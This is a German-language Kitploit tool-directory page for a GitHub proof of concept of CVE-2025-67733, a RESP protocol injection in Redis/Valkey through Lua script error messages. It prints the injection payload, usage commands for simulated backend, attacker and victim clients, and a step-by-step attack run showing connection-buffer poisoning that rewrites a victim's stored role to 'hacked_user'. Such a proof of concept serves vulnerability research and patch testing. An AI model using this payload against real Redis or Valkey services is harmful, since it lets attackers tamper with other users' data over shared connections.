Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-67733 — Redis/Valkey RESP Injection PoC (CVE-2025-67733) | Kitploit
Tools/GitHubGitHub/jylab/cve-2025-67733
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubjylab/cve-2025-67733

CVE-2025-67733

Redis/Valkey RESP Injection PoC (CVE-2025-67733)

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RESP Protocol Injection PoC

Proof-of-concept zur Demonstration einer RESP-Protokoll-Injection über Lua-Skript-Fehlermeldungen in Valkey/Redis.

Dateien

backend.py

Flask-Backend, das eine Webanwendung mit gemeinsamer Valkey-Verbindung (Connection Pooling) simuliert.

Endpunkte:

Tool herunterladen
MethodeEndpunktBeschreibung
POST/api/user/roleBenutzerrolle festlegen
GET/api/user/roleBenutzerrolle abrufen
POST/api/processLua-Skript ausführen

Verwendung:

root@kitploit:~
python backend.py <Valkey-Host> <Valkey-Port> [Passwort]

# Beispiele
python backend.py 127.0.0.1 6379
python backend.py 127.0.0.1 6379 meinpasswort

attacker_client.py

Injiziert bösartige RESP-Daten über eine Lua-Skript-Fehlermeldung in den Socket-Puffer.

Payload:

root@kitploit:~
error(redis.error_reply("INJECTED\r\n$11\r\nhacked_user"))

Verwendung:

root@kitploit:~
python attacker_client.py

victim_client.py

Legitimer Client, der Benutzerrollen festlegt und abruft.

Verwendung:

root@kitploit:~
python victim_client.py set    # Rolle auf "normal_user" setzen
python victim_client.py get    # Aktuelle Rolle abrufen

Angriffsdemonstration

Voraussetzungen

root@kitploit:~
pip install flask requests

Schritte

Terminal 1 – Backend starten:

root@kitploit:~
python backend.py 127.0.0.1 6379

Terminal 2 – Rolle festlegen:

root@kitploit:~
python victim_client.py set
# Ausgabe: 'role':'normal_user' wurde festgelegt.

python victim_client.py get
# Ausgabe: 'role':'normal_user'

Terminal 3 – Angriff:

root@kitploit:~
python attacker_client.py
# Ausgabe: Socket-Poisoning erfolgreich

Terminal 2 – Rolle abrufen (nach dem Angriff):

root@kitploit:~
python victim_client.py get
# Ausgabe: 'role':'hacked_user'

Angriffsablauf

root@kitploit:~
1. Opfer legt Rolle fest
   victim_client.py set --> backend --> Valkey
                                        SET user:user:role "normal_user"

2. Angreifer injiziert Payload
   attacker_client.py --> backend --> Valkey
                                      EVAL 'error(...)' 0

   Backend liest: "-ERR INJECTED\r\n"
   Puffer verbleibt: "$11\r\nhacked_user"

3. Opfer ruft Rolle ab
   victim_client.py get --> backend --> Valkey
                                        GET user:user:role

   Backend liest aus dem Puffer: "$11\r\nhacked_user"
   Opfer erhält: "hacked_user"